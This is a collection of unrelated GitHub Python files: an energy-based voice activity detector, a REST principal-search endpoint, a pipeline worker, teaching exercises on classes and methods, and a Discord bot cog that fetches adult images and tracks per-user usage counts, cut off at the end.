+{"seq_id":"74924236781","text":"#!/usr/bin/env python\n\n# @Authors: Johan Rohdin\n# @Email: rohdin@fit.vutbr.cz\n\n# Kaldi style energy based VAD based on feature extraction code in the VBx recipe.\n# Based on \"predict.py\" by Lukas Burget, Federico Landini, Jan Profant in the\n# BUT-Phonexia VBx recipe and voice-activity-detection.cc/h by Vassil Panayotov,\n# Matthew Maciejewski, Daniel Povey in Kaldi.\n\nimport argparse, glob, os.path, shutil\nfrom src.utils import *\nimport soundfile as sf\nimport numpy as np\nimport re\nimport os\nfrom scipy.io import wavfile\n\ndef run_vad(input_dir:str, output_dir:str):\n \"\"\"\n Run VAD on an input directory, and generates output directory\n \"\"\"\n\n dither_type = \"N\" \n dither_value = 1\n vad_energy_threshold = 5.5\n vad_energy_mean_scale = 0.5\n vad_frames_context = 2\n vad_proportion_threshold = 0.12\n\n f_out = vad(input_dir, output_dir, dither_type, dither_value, vad_energy_threshold, vad_energy_mean_scale, vad_frames_context, vad_proportion_threshold)\n return f_out\n\ndef vad(filename, out_dir, dither_type, dither_value, vad_energy_threshold, vad_energy_mean_scale, vad_frames_context, vad_proportion_threshold):\n \"\"\"\n Kaldi-style energy-based voice activity detection\n \"\"\"\n\n f = filename\n\n np.random.seed(3) \n assert(vad_energy_mean_scale >= 0.0)\n \n file_name = f.split(\"/\")[-1][:-4]\n signal, samplerate = sf.read(f)\n\n # NOTE: Because we don't want any other features than energy, we set NUMCHANS=0.\n # This means fbank_mx.shape=(nfft/2+1,0) = (129,0) in this case. I.e. it is\n # an empty array.\n\n if samplerate == 8000:\n noverlap = 120 # 10ms * 8 sample/ms shift => 200 - 80 = 120 overlap\n winlen = 200 # 25ms * 8 sample/ms\n window = povey_window(winlen)\n fbank_mx = mel_fbank_mx(\n winlen, samplerate, NUMCHANS=0, LOFREQ=20.0, HIFREQ=3700, htk_bug=False)\n elif samplerate == 16000:\n noverlap = 240\n winlen = 400\n window = povey_window(winlen)\n fbank_mx = mel_fbank_mx(\n winlen, samplerate, NUMCHANS=0, LOFREQ=20.0, HIFREQ=7600, htk_bug=False)\n else:\n raise ValueError(f'Only 8kHz and 16kHz are supported. Got {samplerate} instead.')\n \n # Make the signal signed integer values although still as type float\n signal = (signal*2**15)\n\n # Apply dither\n if ( dither_type == \"U\" ):\n signal = add_dither(signal.astype(int), int(dither_value) ) \n elif ( dither_type == \"N\" ):\n signal += np.random.randn(signal.shape[0])*dither_value\n else:\n print(\"WARNING dither is not used\")\n\n # Mirror noverlap//2 initial and final samples (as Kaldi does)\n signal = np.r_[signal[noverlap // 2 - 1::-1],\n signal, signal[-1:-winlen // 2 - 1:-1]]\n\n \n log_energy = fbank_htk(signal, window, noverlap, fbank_mx, USEPOWER=True, ZMEANSOURCE=True, _E=\"first\", ENORMALISE=False)\n log_energy = np.squeeze( log_energy )\n \n energy_threshold = vad_energy_threshold + vad_energy_mean_scale * np.mean(log_energy)\n \n # This does the Kaldi style VAD smoothing.\n vad = np.zeros_like( log_energy )\n for t in range(len(log_energy)):\n num_count = den_count = 0\n context = vad_frames_context\n for t2 in range( t - context, t + context+1):\n if (t2 >= 0 and t2 < len(log_energy)):\n den_count +=1\n if (log_energy[t2] > energy_threshold):\n num_count +=1\n \n if (num_count >= den_count * vad_proportion_threshold):\n vad[t] = 1.0\n else:\n vad[t] = 0.0\n\n # Convert to HTK MLF format (with seconds as units) Print the VAD output\n f_out = file_name + \".lab\"\n\n #f_out = out_dir + \"/\" + re.sub('\\.wav$', '',f).split(\"/\")[-1] + \"/\" + re.sub('\\.wav$', '',f).split(\"/\")[-1] + \".lab\"\n with open(f_out, \"w\") as f:\n \n prev_sym = -1;\n n=0;\n speech_start =0;\n \n for sym in vad:\n if (sym == 1):\n if (prev_sym != 1):\n speech_start = n/100 #*100000\n prev_sym = 1; \n\n elif(sym == 0):\n if (prev_sym == 1):\n speech_end = n/100 #*100000\n f.write(str(speech_start) + \" \" + str(speech_end) + \" sp\\n\")\n prev_sym = 0; \n \n else:\n print(\"ERROR\")\n \n n +=1\n \n # If last one was speech we need to print it.\n if (prev_sym == 1):\n speech_end = n/100 #*100000\n f.write(str(speech_start) + \" \" + str(speech_end) + \" sp\\n\")\n prev_sym = 0\n \n signal, samplerate = sf.read(filename)\n\n full_signal = []\n\n f = open(f_out, \"r\")\n for line in f:\n\n times = line.split(\" \")\n start = int(float(times[0])*samplerate)\n end = int(float(times[1])*samplerate)\n\n data_split = np.array(signal)[start:end]\n full_signal.extend(data_split)\n \n full_signal = np.array(full_signal)\n\n wavfile.write(out_dir, samplerate, full_signal)\n","repo_name":"maelfabien/NLP_Summer_School-2021_Speech_Demo","sub_path":"src/vad.py","file_name":"vad.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"92"}
+{"seq_id":"327760143","text":"import sys\n\nfrom colander import MappingSchema, SchemaNode, SequenceSchema, String, drop\nfrom cornice import Service\nfrom cornice.validators import colander_validator\nfrom pyramid.httpexceptions import HTTPOk\n\nfrom pyams_security.interfaces import ISecurityManager\nfrom pyams_security.interfaces.base import USE_INTERNAL_API_PERMISSION\nfrom pyams_security.rest import check_cors_origin, set_cors_headers\nfrom pyams_security_views.interfaces import REST_PRINCIPALS_SEARCH_ROUTE\nfrom pyams_utils.registry import query_utility\nfrom pyams_utils.rest import BaseResponseSchema, STATUS, rest_responses\n\n__docformat__ = 'restructuredtext'\n\n\nTEST_MODE = sys.argv[-1].endswith('/test')\n\n\nclass PrincipalsSearchQuery(MappingSchema):\n \"\"\"Principals search query\"\"\"\n term = SchemaNode(String(),\n description=\"Principals search string\")\n\n\nclass Principal(MappingSchema):\n \"\"\"Principal result schema\"\"\"\n id = SchemaNode(String(),\n description=\"Principal ID\")\n text = SchemaNode(String(),\n description=\"Principal title\")\n\n\nclass PrincipalsList(SequenceSchema):\n \"\"\"Principals search results interface\"\"\"\n result = Principal()\n\n\nclass PrincipalsSearchResults(BaseResponseSchema):\n \"\"\"Principals search results schema\"\"\"\n results = PrincipalsList(description=\"List of principals matching input term\",\n missing=drop)\n\n\nprincipals_service = Service(name=REST_PRINCIPALS_SEARCH_ROUTE,\n pyramid_route=REST_PRINCIPALS_SEARCH_ROUTE,\n description=\"Principals management\")\n\n\n@principals_service.options(validators=(check_cors_origin, set_cors_headers))\ndef principals_options(request): # pylint: disable=unused-argument\n \"\"\"Principals service options\"\"\"\n return ''\n\n\nclass PrincipalsSearchRequest(MappingSchema):\n \"\"\"Principals search request\"\"\"\n querystring = PrincipalsSearchQuery()\n\n\nclass PrincipalsGetterResponse(MappingSchema):\n \"\"\"Principals getter response\"\"\"\n body = PrincipalsSearchResults()\n\n\nprincipals_get_responses = rest_responses.copy()\nprincipals_get_responses[HTTPOk.code] = PrincipalsGetterResponse(\n description=\"Search results\")\n\n\n@principals_service.get(permission=USE_INTERNAL_API_PERMISSION,\n schema=PrincipalsSearchRequest(),\n validators=(check_cors_origin, colander_validator, set_cors_headers),\n response_schemas=principals_get_responses)\ndef get_principals(request):\n \"\"\"Returns list of principals matching given query\"\"\"\n params = request.params if TEST_MODE else request.validated.get('querystring', {})\n query = params.get('term')\n if not query:\n return {\n 'status': STATUS.ERROR.value,\n 'message': \"Missing arguments\"\n }\n manager = query_utility(ISecurityManager)\n return {\n 'status': STATUS.SUCCESS.value,\n 'results': [{\n 'id': principal.id,\n 'text': principal.title\n } for principal in manager.find_principals(query)]\n }\n","repo_name":"Py-AMS/pyams-security-views","sub_path":"src/pyams_security_views/api/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"42202212738","text":"import asyncio\nimport logging\nimport time\nimport traceback\nfrom datetime import datetime\nfrom functools import lru_cache\n\nfrom model.model.pipeline.trigger_type import TriggerType\n\nimport watchmen\nfrom watchmen.common.constants import pipeline_constants\nfrom watchmen_boot.guid.snowflake import get_surrogate_key\nfrom watchmen.common.utils.data_utils import get_id_name_by_datasource\nfrom watchmen_boot.config.config import settings\nfrom watchmen.database.datasource.container import data_source_container\nfrom watchmen.monitor.model.pipeline_monitor import PipelineRunStatus, StageRunStatus\nfrom watchmen.monitor.services import pipeline_monitor_service\nfrom watchmen.pipeline.core.context.pipeline_context import PipelineContext\nfrom watchmen.pipeline.core.context.stage_context import StageContext\nfrom watchmen.pipeline.core.parameter.parse_parameter import parse_parameter_joint\nfrom watchmen.pipeline.core.worker.stage_worker import run_stage\nfrom watchmen.pipeline.utils.constants import PIPELINE_UID, FINISHED, ERROR\nfrom watchmen.topic.storage.topic_schema_storage import get_topic_by_id, get_topic_by_name\n\nlog = logging.getLogger(\"app.\" + __name__)\n\n\n@lru_cache(maxsize=20)\ndef __build_merge_key(topic_name, trigger_type):\n return topic_name + \"_\" + trigger_type.value\n\n\ndef __merge_pipeline_data(pipeline_trigger_merge_list):\n merge_context = {}\n for pipeline_data in pipeline_trigger_merge_list:\n\n if pipeline_data.topicName in merge_context:\n data_list = merge_context[pipeline_data.topicName].get(pipeline_data.triggerType.value, [])\n data_list.append(pipeline_data.data)\n merge_context[pipeline_data.topicName][pipeline_data.triggerType.value] = data_list\n else:\n merge_context[pipeline_data.topicName] = {pipeline_data.triggerType.value: [pipeline_data.data]}\n\n return merge_context\n\n\ndef __trigger_all_pipeline(pipeline_trigger_merge_list, current_user=None, trace_id=None):\n after_merge_list = __merge_pipeline_data(pipeline_trigger_merge_list)\n\n for topic_name, item in after_merge_list.items():\n merge_data = {}\n topic = get_topic_by_name(topic_name,current_user)\n if TriggerType.update.value in item:\n for update_data in item[TriggerType.update.value]:\n old_value = update_data[pipeline_constants.OLD]\n pk = old_value[\n get_id_name_by_datasource(data_source_container.get_data_source_by_id(topic.dataSourceId))]\n if pk in merge_data:\n merge_data[pk][pipeline_constants.NEW].update(update_data[pipeline_constants.NEW])\n else:\n merge_data[pk] = {pipeline_constants.NEW: update_data[pipeline_constants.NEW],\n pipeline_constants.OLD: update_data[pipeline_constants.OLD]}\n\n for key, data in merge_data.items():\n watchmen.pipeline.index.trigger_pipeline(topic_name, data, TriggerType.update, current_user,\n trace_id)\n if TriggerType.insert.value in item:\n for insert_data in item[TriggerType.insert.value]:\n watchmen.pipeline.index.trigger_pipeline(topic_name, insert_data, TriggerType.insert, current_user,\n trace_id)\n\n\ndef should_run(pipeline_context: PipelineContext) -> bool:\n pipeline = pipeline_context.pipeline\n if pipeline.on is None:\n return True\n current_data = pipeline_context.currentOfTriggerData\n variables = pipeline_context.variables\n return parse_parameter_joint(pipeline.on, current_data, variables)\n\n\nasync def sync_pipeline_monitor_log(pipeline_status):\n pipeline_monitor_service.sync_pipeline_monitor_data(pipeline_status)\n\n\n# noinspection PyBroadException\ndef run_pipeline(pipeline_context: PipelineContext,current_user):\n pipeline = pipeline_context.pipeline\n data = pipeline_context.data\n pipeline_status = PipelineRunStatus(pipelineId=pipeline.pipelineId, uid=get_surrogate_key(),\n startTime=datetime.now().replace(tzinfo=None), topicId=pipeline.topicId,\n tenantId=pipeline_context.currentUser.tenantId,\n traceId=pipeline_context.traceId, pipelineName=pipeline.name)\n pipeline_status.oldValue = data.get(pipeline_constants.OLD)\n pipeline_status.newValue = data.get(pipeline_constants.NEW)\n pipeline_status.currentUser = pipeline_context.currentUser\n if pipeline_context.currentUser is None:\n raise Exception(\"pipeline_context currentUser is None\")\n\n if pipeline.enabled:\n pipeline_topic = get_topic_by_id(pipeline.topicId)\n pipeline_status.pipelineTopicName = pipeline_topic.name\n pipeline_context = PipelineContext(pipeline, data, pipeline_context.currentUser, pipeline_context.traceId)\n pipeline_context.variables[PIPELINE_UID] = pipeline_status.uid\n pipeline_context.pipelineTopic = pipeline_topic\n pipeline_context.pipelineStatus = pipeline_status\n start = time.time()\n if should_run(pipeline_context):\n # noinspection PyBroadException\n try:\n for stage in pipeline.stages:\n stage_run_status = StageRunStatus(name=stage.name)\n stage_context = StageContext(pipeline_context, stage, stage_run_status)\n stage_run_status.name = stage.name\n run_stage(stage_context, stage_run_status)\n pipeline_status.stages.append(stage_context.stageStatus)\n\n elapsed_time = time.time() - start\n pipeline_status.completeTime = elapsed_time\n pipeline_status.status = FINISHED\n log.info(\"run pipeline \\\"{0}\\\" spend time \\\"{1}\\\" \".format(pipeline.name, elapsed_time))\n if pipeline_topic.kind is None or pipeline_topic.kind != pipeline_constants.SYSTEM:\n __trigger_all_pipeline(pipeline_context.pipeline_trigger_merge_list, pipeline_context.currentUser,\n pipeline_context.traceId)\n except Exception as e:\n trace = traceback.format_exc()\n log.error(trace)\n pipeline_status.error = trace\n pipeline_status.status = ERROR\n finally:\n if settings.PIPELINE_MONITOR_ON:\n if pipeline_topic.kind is not None and pipeline_topic.kind == pipeline_constants.SYSTEM:\n log.debug(\"pipeline_status is {0}\".format(pipeline_status))\n else:\n asyncio.ensure_future(sync_pipeline_monitor_log(pipeline_status))\n else:\n log.info(\"pipeline {0} status is {1}\".format(pipeline.name, pipeline_status.status))\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen-matryoshka-doll","sub_path":"watchmen/pipeline/core/worker/pipeline_worker.py","file_name":"pipeline_worker.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"92"}
+{"seq_id":"74787056299","text":"#driver.py\r\nfrom student import Student\r\n\r\ndef main():\r\n #With what we know...\r\n '''\r\n name = 'John'\r\n kuid = 12345\r\n gpa = 3.0\r\n major = 'EECS'\r\n '''\r\n\r\n #Creating new Student\r\n stu1 = Student('John', 12345)\r\n stu2 = Student('Mandy', 54321)\r\n \r\n #Give the attributes values\r\n #stu1.name = 'John'\r\n #stu1.kuid = 12345\r\n stu1.gpa = 3.0\r\n stu1.major = 'EECS'\r\n\r\n #stu2.name = 'Mandy'\r\n #stu2.kuid = 54321\r\n stu2.gpa = 4.0\r\n stu2.major = 'MATH'\r\n\r\n print(stu1.name, ' ' , stu1.gpa)\r\n print(stu2.name, ' ' , stu2.gpa)\r\n\r\n #Notice there's only 1 parameter?\r\n stu1.change_major('COOK')\r\n stu2.change_major('ECON')\r\n\r\n\r\nmain()\r\n \r\n","repo_name":"jwgibbo/public_html","sub_path":"eecs168/2021fall/TR/2021.11.09/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"25158082292","text":"n = int(input())\nwokabl = set()\nfor ind in range(n):\n wokabl.add(input().lower())\n\nn = int(input())\noutset = set()\nfor ind in range(n):\n words = [str(word) for word in input().split()]\n for word in words:\n if word.lower() not in wokabl:\n if word.lower() not in outset:\n print(word) \n outset.add(word.lower())","repo_name":"Solovova/lessons","sub_path":"course/cource373.py","file_name":"cource373.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"197451244","text":"'''\n[Instance Methods]\nThe first method on MyClass, called method, is a regular instance method. That’s the basic, no-frills method type you’ll use most of the time. \nThe method takes at least one parameter, self, which points to an instance of MyClass when the method is called (but of course instance methods can accept more than just one parameter).\nThrough the self parameter, instance methods can freely access attributes and other methods on the same object. This gives them a lot of power when it comes to modifying an object’s state.\nNot only can they modify object state, instance methods can also access the class itself through the self.__class__ attribute. This means instance methods can also modify class state.\n\n[Class Methods]\nLet’s compare that to the second method, MyClass.classmethod. I marked this method with a @classmethod decorator to flag it as a class method.\nInstead of accepting a self parameter, class methods take a cls parameter that points to the class—and not the object instance—when the method is called.\nBecause the class method only has access to this cls argument, it can’t modify object instance state. That would require access to self. \nHowever, class methods can still modify class state that applies across all instances of the class.\n\n[Static Methods]\nThe third method, MyClass.staticmethod was marked with a @staticmethod decorator to flag it as a static method.\nThis type of method takes neither a self nor a cls parameter (but of course it’s free to accept an arbitrary number of other parameters).\nTherefore a static method can neither modify object state nor class state. Static methods are restricted in what data they can access - and they’re primarily a way to namespace your methods.\n\n'''\n\nclass A(object):\n data = \"A's inital value\"\n\n def __init__(self, value=None):\n if value:\n data = value\n\n def method(self):\n return \"instance method called\", self\n\n def method2(self):\n print(self.data)\n\n @classmethod\n def classmethod(cls):\n print(cls.data)\n return \"class method called\", cls\n\n @staticmethod\n def staticmethod():\n return \"static method called\"\n\n\n\nclass AA(A):\n data = \"AA's inital value\"\n data2 = \"AA's special data\"\n\n def __init__(self, value=None, value2=None):\n if value:\n data = value\n if value2:\n self.data2 = value2\n\n\n\ndef test():\n a = A()\n aa = AA(\"new value\")\n\n print(a.method)\n print(a.classmethod)\n print(A.classmethod)\n print(A.staticmethod)\n\n print(AA.classmethod)\n print(A.classmethod)\n print(a.classmethod)\n\n \n\n\nif __name__ == \"__main__\":\n test()","repo_name":"icoding2016/study","sub_path":"PY/basic/method_types.py","file_name":"method_types.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"21308350488","text":"import discord\nfrom discord.ext import commands\nfrom .utils.dataIO import fileIO\nfrom cogs.utils.dataIO import dataIO\nfrom datetime import datetime\nfrom copy import deepcopy\nfrom .utils import checks\nfrom __main__ import send_cmd_help\n# Sys\nimport aiohttp\nimport random\nimport os\nimport sys\nimport requests\n\nDIR_DATA = \"data/oboobs\"\nSETTINGS = DIR_DATA + \"/settings.json\"\n\n\n# API info:\n# example: \"/boobs/10/20/rank/\" - get 20 boobs elements, start from 10th ordered by rank; noise: \"/noise/{count=1; sql limit}/\",\n# example: \"/noise/50/\" - get 50 random noise elements; model search: \"/boobs/model/{model; sql ilike}/\",\n# example: \"/boobs/model/something/\" - get all boobs elements, where model name contains \"something\", ordered by id; author search: \"/boobs/author/{author; sql ilike}/\",\n# example: \"/boobs/author/something/\" - get all boobs elements, where author name contains \"something\", ordered by id; get boobs by id: \"/boobs/get/{id=0}/\",\n# example: \"/boobs/get/6202/\" - get boobs element with id 6202; get boobs count: \"/boobs/count/\"; get noise count: \"/noise/count/\"; vote for boobs: \"/boobs/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/boobs/vote/6202/minus/\" - negative vote for boobs with id 6202; vote for noise: \"/noise/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/noise/vote/57/minus/\" - negative vote for noise with id 57;\n\n# example: \"/butts/10/20/rank/\" - get 20 butts elements, start from 10th ordered by rank; noise: \"/noise/{count=1; sql limit}/\",\n# example: \"/noise/50/\" - get 50 random noise elements; model search: \"/butts/model/{model; sql ilike}/\",\n# example: \"/butts/model/something/\" - get all butts elements, where model name contains \"something\", ordered by id; author search: \"/butts/author/{author; sql ilike}/\",\n# example: \"/butts/author/something/\" - get all butts elements, where author name contains \"something\", ordered by id; get butts by id: \"/butts/get/{id=0}/\",\n# example: \"/butts/get/6202/\" - get butts element with id 6202; get butts count: \"/butts/count/\"; get noise count: \"/noise/count/\"; vote for butts: \"/butts/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/butts/vote/6202/minus/\" - negative vote for butts with id 6202; vote for noise: \"/noise/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/noise/vote/57/minus/\" - negative vote for noise with id 57;\n\nclass BankError(Exception):\n pass\n\n\nclass AccountAlreadyExists(BankError):\n pass\n\n\nclass NoAccount(BankError):\n pass\n\n\nclass Statistique:\n def __init__(self, bot, file_path):\n self.accounts = dataIO.load_json(file_path)\n self.bot = bot\n\n def create_account(self, user):\n server = user.server\n if not self.account_exists(user):\n if server.id not in self.accounts:\n self.accounts[server.id] = {}\n if user.id in self.accounts: # Legacy account <-fort risque de bug\n Sboobs = self.accounts[user.id][\"boobs\"]\n Sass = self.accounts[user.id][\"ass\"]\n Shentai = self.accounts[user.id][\"hentai\"]\n else:\n Sboobs, Sass, Shentai = 0, 0, 0\n timestamp = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\n account = {\"name\": user.name,\n \"boobs\": Sboobs,\n \"ass\": Sass,\n \"hentai\": Shentai,\n \"created_at\": timestamp\n }\n self.accounts[server.id][user.id] = account\n self._save_bank()\n # return self.get_account(user)\n else:\n raise AccountAlreadyExists()\n\n def account_exists(self, user):\n try:\n self._get_account(user)\n except NoAccount:\n return False\n return True\n\n def _get_account(self, user):\n server = user.server\n try:\n return deepcopy(self.accounts[server.id][user.id])\n except KeyError:\n raise NoAccount()\n\n def _save_bank(self):\n dataIO.save_json(\"data/oboobs/statistique.json\", self.accounts)\n\n def get_oboobs_tot(self, user):\n account = self._get_account(user)\n return account[\"boobs\"] + account[\"ass\"] + account[\"hentai\"]\n\n def get_oboobs(self, user, Stype): # Stype=boobs|ass|hentai\n account = self._get_account(user)\n return account[Stype]\n\n def get_max_oboobs(self, user):\n server = user.server\n try:\n max = 0\n theuser = None\n for other in self.accounts[server.id]:\n account = self.accounts[server.id][other]\n k = account[\"boobs\"] + account[\"ass\"] + account[\"hentai\"]\n if k > max:\n max = k\n theuser = other\n if k == 0:\n raise NoAccount()\n return self.accounts[server.id][theuser][\"name\"]\n except:\n raise NoAccount()\n\n def up_oboobs(self, user, Stype): # Stype=boobs|ass|hentai\n server = user.server\n if not self.account_exists(user):\n self.create_account(user)\n account = self._get_account(user)\n account[Stype] = account[Stype] + 1\n self.accounts[server.id][user.id] = account\n self._save_bank()\n\n def wipe_stat(self, server):\n self.accounts[server.id] = {}\n self._save_bank()\n\n def wipe_stat_perso(self, user):\n server = user.server\n if self.account_exists(user):\n temp_server_accounts = {}\n raw_server_accounts = deepcopy(self.accounts[server.id])\n for k in self.accounts[server.id]:\n if k != user.id:\n temp_server_accounts[k] = self.accounts[server.id][k]\n self.accounts[server.id] = temp_server_accounts\n self._save_bank()\n\n\nclass oboobs:\n \"\"\"The oboobs/obutts.ru NSFW pictures of nature cog.\n https://github.com/Canule/Mash-Cogs\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n self.stat_class = Statistique(bot, \"data/oboobs/statistique.json\")\n self.settings = fileIO(SETTINGS, \"load\")\n\n @commands.group(name=\"oboobs\", pass_context=True)\n async def _oboobs(self, ctx):\n \"\"\"The oboobs/obutts.ru pictures of nature cog.\"\"\"\n if ctx.invoked_subcommand is None:\n await send_cmd_help(ctx)\n return\n\n # Boobs\n @commands.command(pass_context=True, no_pm=False)\n async def boobs(self, ctx, *nb):\n \"\"\"Shows some boobs.\"\"\"\n author = ctx.message.author\n nsfwChan = False\n\n try:\n if nb == ():\n nb = 1\n else:\n nb = int(nb[0])\n nb = min(nb, 5)\n except Exception as e:\n nb = 1\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n break\n try:\n if nsfwChan:\n if self.settings[\"nsfw_msg\"]:\n await self.bot.say(\"{}` Pas de ça ici cochon`\".format(author.mention))\n await self.bot.say(\"https://media.giphy.com/media/WUeeGwT8d8KFa/giphy.gif\")\n else:\n for k in range(nb):\n rdm = random.randint(0, 10219)\n search = (\"http://api.oboobs.ru/boobs/{}\".format(rdm))\n async with aiohttp.get(search) as r:\n result = await r.json()\n boob = random.choice(result)\n boob = \"http://media.oboobs.ru/{}\".format(boob[\"preview\"])\n await self.bot.say(\"{}\".format(boob))\n if not ctx.message.channel.is_private:\n self.stat_class.up_oboobs(author, \"boobs\")\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n\n # Hentai\n @commands.command(pass_context=True, no_pm=False)\n async def hentai(self, ctx, *tag):\n \"\"\"Shows some hentai.\"\"\"\n author = ctx.message.author\n nsfwChan = False\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n break\n nmax = 100\n try:\n if tag == ():\n tag = 'nude'\n else:\n tag = tag[0]\n search = \"https://danbooru.donmai.us/posts.xml?limit=\" + str(nmax) + \"&tags=\" + tag\n r = requests.get(search)\n hentai = r.text\n size = len(\"\")\n total = hentai.count(\"\")\n if total == 0:\n await self.bot.say(\"pas de ça en stock\")\n return\n rdm = random.randint(0, min(nmax, total) - 1)\n a, b = 0, 0\n for k in range(rdm + 1):\n a = hentai.index(\"\", a + size)\n b = hentai.index(\"\", b + size)\n hentai = hentai[a + size:b]\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n if not nsfwChan:\n await self.bot.say(\"{}\".format(hentai))\n if not ctx.message.channel.is_private:\n self.stat_class.up_oboobs(author, \"hentai\")\n else:\n await self.bot.send_message(ctx.message.author, \"{}\".format(hentai))\n if self.settings[\"nsfw_msg\"]:\n await self.bot.say(\"{}` Pas de ça ici cochon`\".format(author.mention))\n await self.bot.say(\"http://giphy.com/gifs/mrw-hentai-rV8O58C2QWf4s\")\n\n # Cat\n @commands.command(pass_context=True, no_pm=False)\n async def cat(self, ctx):\n \"\"\"Shows some cats.\"\"\"\n author = ctx.message.author\n search = (\"http://thecatapi.com/api/images/get\")\n try:\n async with aiohttp.get(search) as r:\n cat = r.url\n await self.bot.say(cat)\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n\n # Ass\n @commands.command(pass_context=True, no_pm=False)\n async def ass(self, ctx, *nb):\n \"\"\"Shows some ass.\"\"\"\n author = ctx.message.author\n nsfwChan = False\n try:\n if nb == ():\n nb = 1\n else:\n nb = int(nb[0])\n nb = min(nb, 5)\n except Exception as e:\n nb = 1\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n break\n try:\n if nsfwChan:\n if self.settings[\"nsfw_msg\"]:\n await self.bot.say(\"{}` Pas de ça ici cochon`\".format(author.mention))\n await self.bot.say(\"https://media.giphy.com/media/qIFepMd1Dx0uQ/giphy.gif\")\n else:\n for k in range(nb):\n rdm = random.randint(0, 4155)\n search = (\"http://api.obutts.ru/butts/{}\".format(rdm))\n async with aiohttp.get(search) as r:\n result = await r.json()\n ass = random.choice(result)\n ass = \"http://media.obutts.ru/{}\".format(ass[\"preview\"])\n await self.bot.say(\"{}\".format(ass))\n if not ctx.message.channel.is_private:\n self.stat_class.up_oboobs(author, \"ass\")\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n\n # stat\n @commands.command(pass_context=True, no_pm=False)\n async def stat(self, ctx, user: discord.Member, *tag):\n \"\"\"Show some stats.\"\"\"\n author = ctx.message.author\n try:\n if self.stat_class.account_exists(user):\n if len(tag) != 0 and (tag[0] in [\"boobs\", \"ass\", \"hentai\"]):\n await self.bot.say(\n \"{} a utilisé {} {} fois\".format(user.name, tag[0], self.stat_class.get_oboobs(user, tag[0])))\n else:\n await self.bot.say(\n \"{} a affiché {} truc cochons au total\".format(user.name, self.stat_class.get_oboobs_tot(user)))\n else:\n await self.bot.say(\"{} est encore vierge de ce Discord\".format(user.name))\n except Exception as e:\n await self.bot.say(\"erreur :{}\".format(e))\n\n # stats\n @commands.command(pass_context=True, no_pm=False)\n async def stats(self, ctx):\n \"\"\"Show the Pervert Master.\"\"\"\n author = ctx.message.author\n try:\n sortie = self.stat_class.get_max_oboobs(author)\n await self.bot.say(\"{} est le plus grand pervers de ce Discord\".format(sortie))\n except NoAccount:\n await self.bot.say(\"Toutes les âmes ici-bas sont pûres\")\n\n # reset\n @checks.admin_or_permissions(manage_server=True)\n @_oboobs.command(pass_context=True, no_pm=False)\n async def reStat(self, ctx, user: discord.Member):\n \"\"\"Navifation InPrivate\"\"\"\n author = ctx.message.author\n try:\n self.stat_class.wipe_stat_perso(user)\n except Exception as e:\n await self.bot.say(e)\n await self.bot.say(\"Et un puceau de plus dans ce Discord\")\n\n @checks.admin_or_permissions(manage_server=True)\n @_oboobs.command(pass_context=True, no_pm=False)\n async def nsfw(self, ctx):\n \"\"\"Toggle oboobs nswf for this channel on/off.\n Admin/owner restricted.\"\"\"\n user = ctx.message.author\n nsfwChan = None\n # Reset nsfw.\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n self.settings[\"nsfw_channels\"].remove(a)\n await self.bot.say(\"{} ` nsfw ON`\".format(user.mention))\n break\n # Set nsfw.\n if not nsfwChan:\n if ctx.message.channel not in self.settings[\"nsfw_channels\"]:\n self.settings[\"nsfw_channels\"].append(ctx.message.channel.id)\n await self.bot.say(\"{} ` nsfw OFF`\".format(user.mention))\n fileIO(SETTINGS, \"save\", self.settings)\n\n @checks.admin_or_permissions(manage_server=True)\n @_oboobs.command(pass_context=True, no_pm=False)\n async def togglemsg(self, ctx):\n \"\"\"Enable/Disable the oboobs nswf not allowed message\n Admin/owner restricted.\"\"\"\n user = ctx.message.author\n # Toggle\n if self.settings[\"nsfw_msg\"]:\n self.settings[\"nsfw_msg\"] = False\n await self.bot.say(\"{} ` DM nsfw channel msg is now: Disabled.`\".format(user.mention))\n elif not self.settings[\"nsfw_msg\"]:\n self.settings[\"nsfw_msg\"] = True\n await self.bot.say(\"{} ` DM nsfw channel msg is now: Enabled.`\".format(user.mention))\n fileIO(SETTINGS, \"save\", self.settings)\n\n\ndef check_folders():\n if not os.path.exists(DIR_DATA):\n print(\"Creating data/oboobs folder...\")\n os.makedirs(DIR_DATA)\n\n\ndef check_files():\n settings = {\"nsfw_channels\": [\"133251234164375552\"],\n \"nsfw_msg\": True} # Red's testing chan. nsfw content off by default.\n\n if not fileIO(SETTINGS, \"check\"):\n print(\"Creating settings.json\")\n fileIO(SETTINGS, \"save\", settings)\n\n f = \"data/oboobs/statistique.json\"\n if not dataIO.is_valid_json(f):\n print(\"Creating empty bank.json...\")\n dataIO.save_json(f, 